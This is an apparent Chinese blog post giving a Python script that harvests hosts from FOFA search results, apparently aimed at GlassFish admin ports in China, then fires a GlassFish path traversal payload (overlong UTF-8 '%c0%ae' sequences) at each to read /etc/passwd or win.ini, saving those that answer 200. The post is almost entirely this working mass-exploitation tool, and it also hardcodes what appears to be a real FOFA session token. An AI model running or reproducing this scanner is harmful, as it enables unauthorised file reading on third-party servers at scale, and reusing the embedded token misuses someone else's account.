python脚本 批量化poc编写 

import requests,base64,time,sys
from lxml import etree

# fofa网址获取
# 例如:https://fofa.so/result?qbase64=------------------&page=3
def fofa_search(search_data,page):
    #search_data = '"glassfish" && port="4848" && country="CN"'
    headers = {
        'cookie': 'fofa_token=eyJhbGciOiJIUzUxMi11IsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6ODAwMDgsIm1pZCI6MTAwMDQ5NjY1LCJ1c2VybmFtZSI6IuWGsOezliIsImV4cCI6MTYyODgzMDQ1NH0.meHO7KkOGsMHeW0CsvDyjWU9_P7HXMXxQkM5SenST6Udh4KIfyd38WGHWJ4JPLPVc9QV3o4J9dZixiys2v9E9g'
    }
    for yeshu in range(1,page+1):
        # 我是穷逼,只能看5页
        url = 'https://fofa.so/result?page=' + str(yeshu) + '&qbase64='
        search_data_bs = str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
        urls = url + search_data_bs
        # 使用加载异常
        try:
            print('正在提取第' + str(yeshu) + '')
            result = requests.get(urls, headers=headers).content
            # print(result.decode('utf-8'))
            # 通过lxml获取fofa源码数据
            soup = etree.HTML(result)
            # 提取源码url,a标签的target="_blank
            ip_data = soup.xpath('//a[@target="_blank"]/@href')

            ipdata = '\n'.join(ip_data)
            print(ip_data)
            with open(r'ip.txt', 'a+') as f:
                f.write(ipdata + '\n')
                f.close()
            time.sleep(0.5)
        except Exception as e:
            pass

#payload检测
def check_vuln():
    payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

    for ip in open('ip.txt'):
        ip=ip.replace('\n','')
        windows_url=ip+payload_windows
        linux_url=ip+payload_linux

        try:
            vuln_code_l= requests.get(linux_url).status_code #获取状态码
            vuln_code_w = requests.get(windows_url).status_code #获取状态码
            print("check->"+ip)
            if vuln_code_l == 200 or vuln_code_w == 200:
                with open(r'vuln.txt','a+') as f:
                    f.write(ip)
                    f.close()
            time.sleep(0.5)
        except Exception as e:
            pass

if __name__=="__main__":
    search = sys.argv[1]
    page = sys.argv[2]
    fofa_search(search,int(page))
    check_vuln()

 

posted @ 2021-08-13 10:54  bingtanghulu  阅读(325)  评论(0)    收藏  举报